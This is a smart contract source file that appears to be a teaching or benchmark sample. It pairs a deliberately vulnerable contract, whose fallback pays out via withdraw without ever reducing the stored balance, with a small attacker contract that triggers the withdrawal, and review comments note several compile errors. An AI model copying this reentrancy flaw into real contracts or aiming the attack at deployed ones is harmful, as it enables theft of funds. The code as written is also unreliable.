Fallback_call_cycle.c
// Vulnerable contract
#include "vntlib.h"
// Per-address ledger entry.
typedef struct {
    uint256 name;    // account name
    uint256 balance; // amount recorded as deposited for this address
} Account;
// Contract state: mapping from address to its Account record. The functions
// below access it by assigning accounts.key and then reading accounts.value.
// NOTE(review): no function in this listing ever writes accounts.value.balance.
KEY mapping(address, Account) accounts;
// Contract state: counter initialised to 0; only the fallback function touches it.
KEY uint256 count = 0;
// Constructor: stores the sender of the deployment call in `owner` and sets
// `totalGameCount` to 0.
// NOTE(review): neither `owner` nor `totalGameCount` is declared anywhere in
// this listing (only `accounts` and `count` are). Both need declarations for
// the contract to compile — confirm against the full source.
constructor $Infinite_loop_call_ring(){
    owner = GetSender();
    totalGameCount = 0;
}
// Validate a withdrawal amount for the caller: the amount is meant to be
// positive and covered by the caller's recorded balance; Require() rejects the
// call otherwise.
// Side effect: leaves accounts.key set to the caller's address.
void checkAmount(uint256 amount) {
    // NOTE(review): the closing parenthesis is misplaced. As written, the second
    // argument of U256_Cmp is the expression `U256(0) == 1`, and Require receives
    // the raw comparison result. The intended check is presumably
    // `U256_Cmp(amount, U256(0)) == 1`, i.e. amount > 0.
    Require(U256_Cmp(amount, U256(0) == 1), "amount must > 0");
    address from = GetSender();
    accounts.key = from; // select the caller's record for the accounts.value read below
    uint256 balance = accounts.value.balance;
    PrintAddress("get sender:", from);
    PrintUint256T("get balance:", balance);
    // Require that balance - amount is not below zero.
    // NOTE(review): the right-hand operand is a plain 0 rather than U256(0) as in
    // the first check, and U256SafeSub presumably already rejects an underflow —
    // confirm both against vntlib.
    Require(U256_Cmp(U256SafeSub(balance, amount), 0) != -1,
            "No enough money to bet");
}
// Owner gate: Require() rejects the call unless the caller equals the stored
// owner. No function in this listing calls it, so it protects nothing here.
void checkOwner() {
    Require(Equal(GetSender(), owner) == true, "Only the owner can operate");
}
// Pay `amount` out of the contract to the caller.
// NOTE(review): nothing in this function writes accounts.value.balance, so the
// recorded deposit is the same after the transfer as before it, and the same
// balance check passes again on the next call. A corrected version would
// subtract `amount` from the stored balance before calling
// TransferFromContract, so that a repeated or nested call sees the reduced
// balance.
void withdraw(uint256 amount) {
    // Argument mismatch (the defect the sample itself marks): checkAmount is
    // defined above with a single uint256 parameter but is called with two.
    checkAmount("checkAmount", amount);
    address addr = GetSender();
    // Reads the record selected by accounts.key, which this function never sets;
    // it relies on checkAmount having left the key pointing at the caller.
    uint256 balance = accounts.value.balance;
    // NOTE(review): native >= on uint256, whereas checkAmount compares through
    // U256_Cmp — confirm the operator is valid for this type.
    if (balance >= amount) {
        // Value leaves the contract here; no stored state is updated before or after.
        TransferFromContract(addr, amount);
    }
}
// Fallback function. Every invocation increments `count` and then calls
// withdraw().
// NOTE(review): `amount` is not a parameter, a local, or a state variable in
// this listing, so the call does not resolve as written. The sample's naming
// ("Fallback_call_cycle", "Infinite_loop_call_ring") suggests the intended
// lesson is that a fallback which pays out can presumably be entered again by
// the transfer it triggers. A fallback should not move funds, and any payout
// path should update state before transferring.
$_(){
    count++;
    // count starts at 0 and was just incremented, so short of wrap-around this
    // condition holds on every call; it does not limit how often withdraw() runs.
    if (count){
        withdraw(amount);
    }
}
// Attacker contract
#include "vntlib.h"
// Cross-contract declaration of the target contract's withdraw(). The leading
// CallParams argument is supplied by the caller in attack() and identifies the
// contract being called; it is not a parameter of the target's own definition.
CALL void withdraw(CallParams params, uint256 amount);
// Calls withdraw(100) on the vulnerable contract through the cross-contract
// declaration above.
void attack () {
    // "0xaaaa" stands in for the vulnerable contract's address. The other two
    // fields are presumably the value sent and the gas limit — confirm against
    // the CallParams definition in vntlib.
    CallParams target = {Address("0xaaaa"), U256(10000), 100000};
    withdraw(target, 100);
}
...